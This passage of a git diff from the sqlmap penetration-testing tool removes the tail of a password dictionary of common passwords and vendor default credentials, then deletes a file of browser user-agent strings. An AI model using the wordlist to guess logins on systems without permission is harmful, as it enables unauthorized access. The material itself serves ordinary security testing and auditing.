-saint -sakura -salasana -sales -sally -salmon -salut -sam -samantha -samiam -samIam -sammie -sammy -Sammy -sample -sampleatm -sampson -samsam -samson -samuel -sandi -sandra -sandy -sanjose -santa -sap -saphire -sapphire -sapr3 -sarah -sarah1 -sasha -saskia -sassy -satori -saturday -saturn -Saturn -saturn5 -savage -sbdc -scarecrow -scarlet -scarlett -schnapps -school -science -scooby -scoobydoo -scooter -scooter1 -scorpio -scorpion -scotch -scott -scott1 -scottie -scotty -scout -scouts -scrooge -scruffy -scuba -scuba1 -sdos_icsap -sean -search -seattle -secdemo -secret -secret3 -security -seeker -senha -seoul -september -serena -sergei -sergey -server -service -Service -serviceconsumer1 -services -seven -seven7 -sex -sexy -sh -shadow -Shadow -shadow1 -shaggy -shalom -shanghai -shannon -shanny -shanti -shaolin -shark -sharon -shasta -shawn -shayne -shazam -sheba -sheena -sheila -shelby -shelley -shelly -shelter -shelves -sherry -ship -shirley -shit -shithead -shoes -shogun -shorty -shotgun -Sidekick -sidney -sierra -Sierra -sigmachi -signal -signature -si_informtn_schema -silver -simba -simba1 -simon -simple -simsim -sinatra -singer -sirius -siteminder -skate -skeeter -Skeeter -skibum -skidoo -skiing -skip -skipper -skipper1 -skippy -skull -skunk -skydive -skyler -skywalker -slacker -slayer -sleepy -slick -slidepw -slider -slip -smashing -smegma -smile -smile1 -smiles -smiley -smiths -smitty -smoke -smokey -Smokey -smurfy -snake -snakes -snapper -snapple -snickers -sniper -snoop -snoopdog -snoopy -Snoopy -snow -snowball -snowflake -snowman -snowski -snuffy -sober1 -soccer -soccer1 -softball -soleil -solomon -sonic -sonics -sonny -sony -sophia -sophie -sound -space -spain -spanky -sparks -sparky -Sparky -sparrow -spartan -spazz -special -speedo -speedy -Speedy -spencer -sphynx -spider -spierson -spike -spike1 -spitfire -spock -sponge -spooky -spoon -sports -spot -spring -sprite -sprocket -spunky -spurs -squash -ssp -sss -ssssss -stacey -stan -stanley -star -star69 -starbuck -stargate -starlight -stars -start -starter -startrek -starwars -station -stealth -steel -steele -steelers -stella -steph -steph1 -stephani -stephanie -stephen -stephi -Sterling -steve -steve1 -steven -Steven -steven1 -stevens -stewart -stimpy -sting -sting1 -stingray -stinky -stivers -stocks -stone -storage -storm -stormy -stranger -strat -strato -strat_passwd -strawberry -stretch -strong -stuart -stud -student -student2 -studio -stumpy -stupid -success -sucker -suckme -sue -sugar -sultan -summer -Summer -summit -sumuinen -sun -sunbird -sundance -sunday -sunfire -sunflower -sunny -sunny1 -sunrise -sunset -sunshine -Sunshine -super -superfly -superman -Superman -supersecret -superstar -support -supra -surf -surfer -surfing -susan -susan1 -susanna -sutton -suzanne -suzuki -suzy -Sverige -swanson -sweden -sweetie -sweetpea -sweety -swim -swimmer -swimming -switzer -Swoosh -swordfish -swpro -swuser -sydney -sylvia -sylvie -symbol -sympa -sys -sysadm -sysadmin -sysman -syspass -sys_stnt -system -system5 -systempass -tab -tabatha -tacobell -taffy -tahiti -taiwan -talon -tamara -tammy -tamtam -tango -tanner -tanya -tapani -tara -targas -target -tarheel -tarzan -tasha -tata -tattoo -taurus -Taurus -taylor -Taylor -tazdevil -tbird -t-bone -tdos_icsap -teacher -tech -techno -tectec -teddy -teddy1 -teddybear -teflon -telecom -temp -temporal -tennis -Tennis -tequila -teresa -terminal -terry -terry1 -test -test1 -test123 -test2 -test3 -tester -testi -testing -testpass -testpilot -testtest -test_user -texas -thankyou -the -theatre -theboss -theend -thejudge -theking -thelorax -theresa -Theresa -thinsamplepw -thisisit -thomas -Thomas -thompson -thorne -thrasher -thumper -thunder -Thunder -thunderbird -thursday -thx1138 -tibco -tiffany -tiger -tiger2 -tigers -tigger -Tigger -tightend -tigre -tika -tim -timber -time -timothy -tina -tinker -tinkerbell -tintin -tip37 -tnt -toby -today -tokyo -tom -tomcat -tommy -tony -tool -tootsie -topcat -topgun -topher -tornado -toronto -toshiba -total -toto1 -tototo -toucan -toyota -trace -tracy -training -transfer -transit -transport -trapper -trash -travel -travis -tre -treasure -trebor -tree -trees -trek -trevor -tricia -tricky -trident -trish -tristan -triton -trixie -trojan -trombone -trophy -trouble -trout -truck -trucker -truman -trumpet -trustno1 -tsdev -tsuser -tucker -tucson -tuesday -Tuesday -tula -turbine -turbo -turbo2 -turtle -tweety -twins -tyler -tyler1 -ultimate -um_admin -um_client -undead -unicorn -unique -united -unity -unix -unknown -upsilon -ursula -user -user0 -user1 -user2 -user3 -user4 -user5 -user6 -user7 -user8 -user9 -utility -utlestat -utopia -vacation -vader -val -valentin -valentine -valerie -valhalla -valley -vampire -vanessa -vanilla -vea -vedder -veh -velo -velvet -venice -venus -vermont -Vernon -veronica -vertex_login -vette -vicki -vicky -victor -victor1 -victoria -Victoria -victory -video -videouser -vif_dev_pwd -viking -vikram -vincent -Vincent -vincent1 -violet -violin -viper -viper1 -virago -virgil -virginia -viruser -visa -vision -visual -volcano -volley -volvo -voodoo -vortex -voyager -vrr1 -vrr2 -waiting -walden -waldo -walker -walleye -wally -walter -wanker -warcraft -warlock -warner -warren -warrior -warriors -water -water1 -Waterloo -watson -wayne -wayne1 -weasel -webcal01 -webdb -webmaster -webread -webster -Webster -wedge -weezer -welcome -wendy -wendy1 -wesley -west -western -wfadmin -wh -whale1 -whatever -wheels -whisky -whit -white -whitney -whocares -whoville -wibble -wilbur -wildcat -will -william -william1 -williams -willie -willow -Willow -willy -wilma -wilson -win95 -wind -window -Windows -windsurf -winner -winnie -Winnie -winniethepooh -winona -winston -winter -wip -wisdom -wizard -wkadmin -wkproxy -wksys -wk_test -wkuser -wms -wmsys -wob -wolf -wolf1 -wolfgang -wolverine -Wolverine -wolves -wombat -wombat1 -wonder -wood -Woodrow -woody -woofwoof -word -world -World -wps -wrangler -wright -wsh -wsm -www -wwwuser -xademo -xanadu -xanth -xavier -xcountry -xdp -x-files -xfiles -xla -x-men -xnc -xni -xnm -xnp -xns -xprt -xtr -xxx -xxx123 -xxxx -xxxxxx -xxxxxxxx -xyz -xyz123 -y -yamaha -yankee -yankees -yellow -yes -yoda -yogibear -yolanda -yomama -young -your_pass -yukon -yvette -yvonne -zachary -zack -zapata -zaphod -zebra -zebras -zenith -zephyr -zeppelin -zepplin -zeus -zhongguo -ziggy -zigzag -zoltan -zombie -zoomer -zorro -zwerg -zxc -zxc123 -zxcvb -Zxcvb -zxcvbn -zxcvbnm -Zxcvbnm -zzz diff --git a/txt/user-agents.txt b/txt/user-agents.txt deleted file mode 100644 index b36ddc21f38..00000000000 --- a/txt/user-agents.txt +++ /dev/null @@ -1,2078 +0,0 @@ -# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission - -Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1) -Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30) -Mozilla/4.0 (Windows; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) -Mozilla/4.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0 -Mozilla/4.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.59 Safari/525.19 -Mozilla/4.0 (compatible; MSIE 6.0; Linux i686 ; en) Opera 9.70 -Mozilla/4.0 (compatible; MSIE 6.0; Mac_PowerPC; en) Opera 9.24 -Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 9.50 -Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.24 -Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.26 -Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; es-la) Opera 9.27 -Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 9.52 -Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; en) Opera 9.27 -Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; en) Opera 9.50 -Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.0; en) Opera 9.26 -Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.0; en) Opera 9.50 -Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.0; tr) Opera 10.10 -Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; de) Opera 10.10 -Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 9.22 -Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 9.27 -Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux x86_64; en) Opera 9.50 -Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux x86_64; en) Opera 9.60 -Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; YPC 3.2.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506) -Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; YPC 3.2.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618) -Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) -Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) -Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) -Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; .NET4.0C; .NET4.0E; InfoPath.3) -Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; SLCC2; .NET CLR 2.0.50727; InfoPath.3; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8) -Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.0.3705; Media Center PC 3.1; Alexa Toolbar; .NET CLR 1.1.4322; .NET CLR 2.0.50727) -Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322) -Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.40607) -Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727) -Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar) -Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727) -Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1) -Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727) -Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; FDM; .NET CLR 1.1.4322) -Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1) -Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30) -Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) -Mozilla/4.0 (compatible; MSIE 8.0; Linux i686; en) Opera 10.51 -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; ko) Opera 10.53 -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00 -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00 -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00 -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; OfficeLiveConnector.1.4; OfficeLivePatch.1.3; yie8) -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3) -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; Zune 4.0) -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8) -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; .NET4.0C; .NET4.0E; Zune 4.7) -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; .NET4.0C; .NET4.0E; Zune 4.7; InfoPath.3) -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E) chromeframe/8.0.552.224 -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 3.0) -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; msn OptimizedIE8;ZHCN) -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2) -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.3; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8) -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; Media Center PC 6.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C) -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8) -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; en) Opera 10.62 -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00 -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) -Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; de) Opera 10.62 -Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00 -Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0) -Mozilla/4.0 (compatible;MSIE 7.0;Windows NT 6.0) -Mozilla/4.61 (Macintosh; I; PPC) -Mozilla/4.61 [en] (OS/2; U) -Mozilla/4.7 (compatible; OffByOne; Windows 2000) -Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1) -Mozilla/4.79 [en] (compatible; MSIE 7.0; Windows NT 5.0; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648) -Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC) -Mozilla/4.8 [en] (Windows NT 5.0; U) -Mozilla/5.0 (Linux i686 ; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.70 -Mozilla/5.0 (Linux i686; U; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.51 -Mozilla/5.0 (Linux; U; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13 -Mozilla/5.0 (MSIE 7.0; Macintosh; U; SunOS; X11; gu; SV1; InfoPath.2; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648) -Mozilla/5.0 (Macintosh; I; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20061204 Firefox/3.0a1 -Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8 -Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 -Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_4) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30 -Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.12 Safari/534.24 -Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.698.0 Safari/534.24 -Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 -Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.0 Safari/534.24 -Mozilla/5.0 (Macintosh; Intel Mac OS X; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.27 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-GB; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.10) Gecko/2009122115 Firefox/3.0.17 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b3pre) Gecko/20090204 Firefox/3.1b3pre -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 GTB5 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; it; rv:1.9b4) Gecko/2008030317 Firefox/3.0b4 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ko; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.0.13) Gecko/2009073021 Firefox/3.0.13 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 GTB5 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2) Gecko/20091218 Firefox 3.6b5 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.7; en-US; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-gb) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/ Safari/530.5 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/ Safari/530.6 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/530.9 (KHTML, like Gecko) Chrome/ Safari/530.9 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-gb) AppleWebKit/528.10+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-US) AppleWebKit/531.3 (KHTML, like Gecko) Chrome/3.0.192 Safari/531.3 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.196 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.212.1 Safari/532.1 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.1 Safari/530.18 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/531.2+ (KHTML, like Gecko) Version/4.0.1 Safari/530.18 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.208.0 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.210.0 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.5 Safari/532.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.302.2 Safari/532.8 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.343.0 Safari/533.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.422.0 Safari/534.1 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/6.0.453.1 Safari/534.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.3 Safari/531.21.10 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; es-es) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; fi-fi) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; fr-fr) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; it-it) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; ja-jp) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; nl-nl) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-cn) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-tw) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.4 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.204.0 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.1 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.212.1 Safari/532.1 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.307.11 Safari/532.9 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.209.0 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.212.0 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.4 Safari/532.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) 